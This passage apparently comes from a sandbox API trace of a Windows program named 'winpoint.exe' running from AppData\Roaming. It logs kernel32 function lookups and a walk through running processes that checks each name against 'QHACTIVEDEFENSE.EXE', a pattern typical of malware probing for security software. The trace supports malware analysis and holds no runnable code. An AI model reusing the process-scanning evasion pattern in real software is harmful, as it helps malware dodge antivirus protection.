5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x94\xed\x18\xe9\xb0\xfa\x18", lpUsedDefaultChar=0x0) returned 256 [0162.696] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x49a270, nSize=0x104 | out: lpFilename="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe")) returned 0x34 [0162.696] RtlInitializeSListHead (in: ListHead=0x49a040 | out: ListHead=0x49a040) [0162.696] GetLastError () returned 0x0 [0162.696] SetLastError (dwErrCode=0x0) [0162.696] GetEnvironmentStringsW () returned 0x63d848* [0162.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1498 [0162.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1498, lpMultiByteStr=0x63e408, cbMultiByte=1498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1498 [0162.698] FreeEnvironmentStringsW (penv=0x63d848) returned 1 [0162.699] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75c90000 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsAlloc") returned 0x75ca4f2b [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsFree") returned 0x75ca359f [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsGetValue") returned 0x75ca1252 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="FlsSetValue") returned 0x75ca4208 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeCriticalSectionEx") returned 0x75ca4d28 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="InitOnceExecuteOnce") returned 0x75cbd627 [0162.699] GetProcAddress (hModule=0x75c90000, lpProcName="CreateEventExW") returned 0x75d2410b [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSemaphoreW") returned 0x75cbca5a [0162.700] 
GetProcAddress (hModule=0x75c90000, lpProcName="CreateSemaphoreExW") returned 0x75d24195 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThreadpoolTimer") returned 0x75cbee7e [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadpoolTimer") returned 0x77d7441c [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77d9c50e [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CloseThreadpoolTimer") returned 0x77d9c381 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThreadpoolWait") returned 0x75cbf088 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadpoolWait") returned 0x77d805d7 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="CloseThreadpoolWait") returned 0x77d9ca24 [0162.700] GetProcAddress (hModule=0x75c90000, lpProcName="FlushProcessWriteBuffers") returned 0x77d50b8c [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77e0fde8 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcessorNumber") returned 0x77da1e1d [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="CreateSymbolicLinkW") returned 0x75d1cd11 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentPackageId") returned 0x0 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetTickCount64") returned 0x75cbeee0 [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileInformationByHandleEx") returned 0x75cbc78f [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="SetFileInformationByHandle") returned 0x75cccbfc [0162.701] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeConditionVariable") returned 0x77d68456 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="WakeConditionVariable") returned 0x77dd7de4 [0162.702] GetProcAddress 
(hModule=0x75c90000, lpProcName="WakeAllConditionVariable") returned 0x77d9409d [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="SleepConditionVariableCS") returned 0x75d24b32 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeSRWLock") returned 0x77d68456 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="AcquireSRWLockExclusive") returned 0x77d629f1 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77d74892 [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="ReleaseSRWLockExclusive") returned 0x77d629ab [0162.702] GetProcAddress (hModule=0x75c90000, lpProcName="SleepConditionVariableSRW") returned 0x75d24b74 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThreadpoolWork") returned 0x75cbee45 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="SubmitThreadpoolWork") returned 0x77da8491 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="CloseThreadpoolWork") returned 0x77d9d8e2 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="CompareStringEx") returned 0x75d246b1 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="GetLocaleInfoEx") returned 0x75d24751 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="LCMapStringEx") returned 0x75d247f1 [0162.703] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75c90000 [0162.703] GetProcAddress (hModule=0x75c90000, lpProcName="InitializeConditionVariable") returned 0x77d68456 [0162.704] GetProcAddress (hModule=0x75c90000, lpProcName="SleepConditionVariableCS") returned 0x75d24b32 [0162.705] GetProcAddress (hModule=0x75c90000, lpProcName="WakeAllConditionVariable") returned 0x77d9409d [0162.705] RtlInitializeConditionVariable () returned 0x49a024 [0162.705] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0162.705] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x450139) returned 0x0 [0162.706] lstrlenW (lpString="FossPass") returned 8 [0162.706] lstrlenW 
(lpString="FossPass") returned 8 [0162.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75c90000 [0162.706] GetProcAddress (hModule=0x75c90000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x75d23f49 [0162.706] GetProcAddress (hModule=0x75c90000, lpProcName="ProcessIdToSessionId") returned 0x75ca1275 [0162.706] GetCurrentProcessId () returned 0x870 [0162.706] ProcessIdToSessionId (in: dwProcessId=0x870, pSessionId=0x49aa38 | out: pSessionId=0x49aa38) returned 1 [0162.707] CreateSemaphoreW (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0xd8 [0162.707] GetCurrentProcess () returned 0xffffffff [0162.707] GetCurrentThread () returned 0xfffffffe [0162.707] GetCurrentProcess () returned 0xffffffff [0162.707] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63e778, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63e778*=0xdc) returned 1 [0162.707] GetCurrentThreadId () returned 0x650 [0162.707] SetThreadPriority (hThread=0xdc, nPriority=0) returned 1 [0162.707] QueryPerformanceCounter (in: lpPerformanceCount=0x49aa60 | out: lpPerformanceCount=0x49aa60*=28092257394) returned 1 [0162.707] QueryPerformanceFrequency (in: lpFrequency=0x49aa70 | out: lpFrequency=0x49aa70) returned 1 [0162.707] lstrlenW (lpString="") returned 0 [0162.708] lstrlenA (lpString="Non-def App") returned 11 [0162.708] GetStartupInfoW (in: lpStartupInfo=0x18fad0 | out: lpStartupInfo=0x18fad0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0162.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0162.711] lstrcpyW (in: lpString1=0x18f8e4, lpString2="QHACTIVEDEFENSE.EXE" | out: 
lpString1="QHACTIVEDEFENSE.EXE") returned="QHACTIVEDEFENSE.EXE" [0162.711] lstrlenW (lpString="QHACTIVEDEFENSE.EXE") returned 19 [0162.711] CharUpperBuffW (in: lpsz="QHACTIVEDEFENSE.EXE", cchLength=0x13 | out: lpsz="QHACTIVEDEFENSE.EXE") returned 0x13 [0162.711] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.711] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0162.711] lstrlenW (lpString="[System Process]") returned 16 [0162.711] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0162.711] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.714] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.714] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0162.714] lstrlenW (lpString="System") returned 6 [0162.714] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0162.715] lstrcmpW (lpString1="SYSTEM", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.715] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.715] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0162.715] lstrlenW 
(lpString="smss.exe") returned 8 [0162.715] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0162.715] lstrcmpW (lpString1="SMSS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.715] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.716] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.716] lstrlenW (lpString="csrss.exe") returned 9 [0162.716] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.716] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.716] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.717] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0162.717] lstrlenW (lpString="wininit.exe") returned 11 [0162.717] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0162.717] lstrcmpW (lpString1="WININIT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.717] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.718] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0162.718] lstrlenW (lpString="csrss.exe") returned 9 [0162.718] 
CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0162.718] lstrcmpW (lpString1="CSRSS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.718] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.719] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0162.719] lstrlenW (lpString="winlogon.exe") returned 12 [0162.719] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0162.719] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.719] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.719] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0162.719] lstrlenW (lpString="services.exe") returned 12 [0162.719] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0162.719] lstrcmpW (lpString1="SERVICES.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.719] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.720] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0162.720] lstrlenW (lpString="lsass.exe") returned 9 [0162.720] CharUpperBuffW 
(in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0162.720] lstrcmpW (lpString1="LSASS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.720] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0162.721] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0162.721] lstrlenW (lpString="lsm.exe") returned 7 [0162.721] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0162.721] lstrcmpW (lpString1="LSM.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.721] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.722] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.722] lstrlenW (lpString="svchost.exe") returned 11 [0162.722] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.722] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.722] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.722] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.722] lstrlenW (lpString="svchost.exe") returned 11 [0162.722] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: 
lpsz="SVCHOST.EXE") returned 0xb [0162.722] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.722] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.723] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.723] lstrlenW (lpString="svchost.exe") returned 11 [0162.723] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.723] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.723] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.724] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.724] lstrlenW (lpString="svchost.exe") returned 11 [0162.724] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.724] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.724] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.725] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.725] lstrlenW (lpString="svchost.exe") returned 11 [0162.725] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: 
lpsz="SVCHOST.EXE") returned 0xb [0162.725] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.725] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.725] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0162.725] lstrlenW (lpString="audiodg.exe") returned 11 [0162.725] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0162.725] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.725] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.726] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.726] lstrlenW (lpString="svchost.exe") returned 11 [0162.726] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.726] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.726] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.727] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.727] lstrlenW (lpString="svchost.exe") returned 11 [0162.727] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: 
lpsz="SVCHOST.EXE") returned 0xb [0162.727] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.727] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.727] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0162.727] lstrlenW (lpString="spoolsv.exe") returned 11 [0162.728] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0162.728] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.728] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.728] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.728] lstrlenW (lpString="svchost.exe") returned 11 [0162.728] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.728] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.728] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.729] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.729] lstrlenW (lpString="taskhost.exe") returned 12 [0162.729] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: 
